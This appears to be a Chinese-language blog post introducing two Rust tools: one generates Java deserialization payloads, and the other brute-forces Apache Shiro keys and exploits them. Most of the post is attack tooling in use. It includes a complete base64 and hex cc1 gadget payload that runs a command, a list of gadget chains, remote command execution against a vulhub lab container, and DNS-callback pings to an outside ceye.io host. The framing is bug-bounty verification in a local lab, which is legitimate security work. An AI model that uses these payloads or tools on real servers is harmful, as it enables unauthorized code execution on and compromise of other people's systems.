纯Rust编写Apache-Shiro利用工具
发布时间: 2023-03-27
前言
- 最近挖SRC用之前go写的key检测工具找到了很多apache-shiro的网站,但是提交还得验证能够利用漏洞才可以,因为很多都是有key但是没有利用链的,网上的利用工具多数为java编写的图形化工具,但是在我系统因为开发装了IDEA,切换java环境比较麻烦,而且要指定javafx模块才可以显示图形化界面,所以写了一个纯Rust语言的利用工具。
ysoserial
- 问题最大的就是java的反序列化了,不是java语言开发的就无法引用https://github.com/frohoff/ysoserial的代码了,但是go语言开发的https://github.com/chaitin/xray也可以做到,最后找到了https://github.com/phith0n/zkar,但是如果用rust重写的话工作量太大了,最后还是在java生成的ser文件做替换,只要将不同的命令参数生成出来diff就可以了。
- 最后按照替换命令的位置,和序列化生成的长度就可以得到和java生成出来的ser文件一样了。
- 最后的https://github.com/emo-cat/ysoserial_rs就出来了,针对java反序列化的库
➜ ~ ./ysoserial_amd64 --help
Usage: ysoserial_amd64 [-p <payload>] [-c <command>] [--url <url>] [--echo-name <echo-name>] [--command-name <command-name>] [-o <output>] [-f <format>] [-l]
ysoserial_rs
Options:
-p, --payload select a payload
-c, --command command to execute
--url url to request dns
--echo-name tomcat echo request header name
--command-name tomcat command request header name
-o, --output save payload to file
-f, --format format to hex or base64
-l, --list list all payload
--help display usage information
- 列举全部可用payload,为了方便使用常用的攻击链都简写了。
➜ ~ ./ysoserial_amd64 -l [5/62]
Payload List:
------------
bs1
c3p0
cc1
cc2
cc3
cc4
cc5
cc6
cc7
cck1
cck1_tomcat_echo
cck2
cck2_tomcat_echo
cck3
cck4
clojure
groovy1
hibernate1
hibernate2
javassist_weld1
jboss_interceptors1
jdk7u21
jdk8u20
json1
mozilla_rhino1
mozilla_rhino2
myfaces1
rome
shiro_spc
spring1
spring2
url_dns
vaadin1
- 例如选择
cc1攻击链,执行的命令为whoami
➜ ~ ./ysoserial_amd64 -p cc1 -c whoami
sr2sun.reflect.annotation.AnnotationInvocationHandlerU~L
java.util.Mapxrjava.lang.reflect.Proxy' CLht%Ljava/lang/reflect/InvocationHandler;xpsq~sr*org.apache.commons.collections.map.LazyMapn唂yLfactoryt,LiTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;V*4xpsr;org.apache.commons.collections.functors.ConstantTransformerXvAL iConstanttLjava/lang/Object;xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformerk{|8[iArgst[Ljava/lang/Object;L
iMethodNametLjava/lang/String;[
iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;Xs)lxpt
getRuntimeur[Ljava.lang.Class;Zxpt getMethoduq~vrjava.lang.String8z;Bxpvq~sq~uq~uq~invokeuq~vrjava.lang.Objectxpvq~q~ur[Ljava.lang.String;V{Gxptwhoamitexecuq~q~#sq~srjava.lang.Integer⠤8Ivaluexrjava.lang.Number
xpsrjava.util.HashMap`F
loadFactorI thresholdxp?@xxvrjava.lang.Overridexpq~:%
- 可以输出到文件,或者格式化为hex和base64格式
➜ ~ ./ysoserial_amd64 -p cc1 -c whoami -o cc1.ser
写入文件:cc1.ser,payload大小:1398
➜ ~ ./ysoserial_amd64 -p cc1 -c whoami -f base64
rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACcHVxAH4AGwAAAAB0AAZpbnZva2V1cQB+AB4AAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAbc3EAfgAWdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQABndob2FtaXQABGV4ZWN1cQB+AB4AAAABcQB+ACNzcQB+ABFzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh2cgASamF2YS5sYW5nLk92ZXJyaWRlAAAAAAAAAAAAAAB4cHEAfgA6%
➜ ~ ./ysoserial_amd64 -p cc1 -c whoami -f hex
aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000677686f616d69740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a%
apache-shiro的利用
- 获取到目标先检测是否为apache-shiro组件,识别为是才进行后面的操作,然后爆破key,分别对HTTP请求:GET,POST;和加密模式:CBC,GCM进行枚举,和之前用go语言写的检测方法一样,得到key之后才到利用阶段。
- 利用阶段只要把
shiro_spc的payload替换为攻击payload就可以了,如果只是想验证漏洞是否存在,就可以使用url_dns这个payload,指定DNS记录服务器,可以去查看DNS记录。
使用说明
https://github.com/emo-cat/emo_shiro
➜ ~ ./emo_shiro --help
Usage: emo_shiro [--key <key>] [-m <mode>] [-t <target>] [-s <ser>] [--file <file>] [--keys <keys>] [--csv <csv>] [--proxy <proxy>] [--timeout <timeout>] [--thread <thread>] [--exploit] [--dns <dns>] [-p <payload>] [-c <command>] [--echo-name <echo-name>] [--command-name <command-name>] [-l]
emo_shiro
Options:
--key you can specify known keys
-m, --mode apache-shiro encryption algorithm,default: CBC
-t, --target the target
-s, --ser serialize file
--file read the target from the file
--keys read the key from the file
--csv export to the csv file
--proxy proxy to use for requests
(ex:[http(s)|socks5(h)]://host:port)
--timeout set request timeout
--thread number of concurrent threads
--exploit exploit mode
--dns dns identifier, default: 981tzg.ceye.io
-p, --payload select a payload
-c, --command command to execute
--echo-name tomcat echo request header name
--command-name tomcat command request header name
-l, --list list all payload
--help display usage information
靶场验证
- 搭建靶场
➜ ~ docker run --rm -p 8080:8080 vulhub/shiro:1.2.4
- 只爆破key,不做攻击操作,也就是之使用
shiro_spc的payload。
➜ ~ ./emo_shiro -t <http://127.0.0.1:8080>
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url | method | verify | mode | key |
+=========================================================================+========+========+======+==========================+
| <http://127.0.0.1:8080/login;jsessionid=F030B2F5CECA009F87310F3ADABDEDE5> | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
- 利用DNS记录验证漏洞
➜ ~ ./emo_shiro -t <http://127.0.0.1:8080> --exploit --dns test.981tzg.ceye.io
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url | method | verify | mode | key |
+=========================================================================+========+========+======+==========================+
| <http://127.0.0.1:8080/login;jsessionid=6E1B5E50D8ABC278B182A1EFEF0339C6> | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
➜ ~
- 查看DNS记录得到目标和端口组合的前缀日志。
- 非回显验证,执行命令创建一个emo的文件夹。
➜ ~ ./emo_shiro -t <http://127.0.0.1:8080> --exploit -p cck1 -c "mkdir /emo"
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url | method | verify | mode | key |
+=========================================================================+========+========+======+==========================+
| <http://127.0.0.1:8080/login;jsessionid=DCBEFCFB8DF4FA752EB0BD114D9BEE2A> | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
➜ ~
root@b956d303a5b1:/# ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin shirodemo-1.0-SNAPSHOT.jar srv sys tmp usr var
root@b956d303a5b1:/# ls
bin boot dev emo etc home lib lib64 media mnt opt proc root run sbin shirodemo-1.0-SNAPSHOT.jar srv sys tmp usr var
root@b956d303a5b1:/# cd emo/
root@b956d303a5b1:/emo#
- 主要利用ping命令带上利用链名称拼接到DNS前缀,如果能在DNS记录中看到说明可以使用该利用链。
- 因为window和linux系统下ping限制次数的参数有冲突,在linux也不能一直让它ping,最后找到了两个系统都兼容的命令
ping -n 2 -w 2 981tzg.ceye.io,虽然在linux前一个ping会报错,但是还是能自动结束。
➜ emo_shiro git:(main) ✗ cargo run -- -t <http://127.0.0.1:8080> --exploit --dns 981tzg.ceye.io --chain
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url | method | verify | mode | key |
+=========================================================================+========+========+======+==========================+
| <http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7> | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
- 查看DNS记录得到可用利用链,说明
bs1,cck3,cc5,cc7,cck1和cc6利用链可用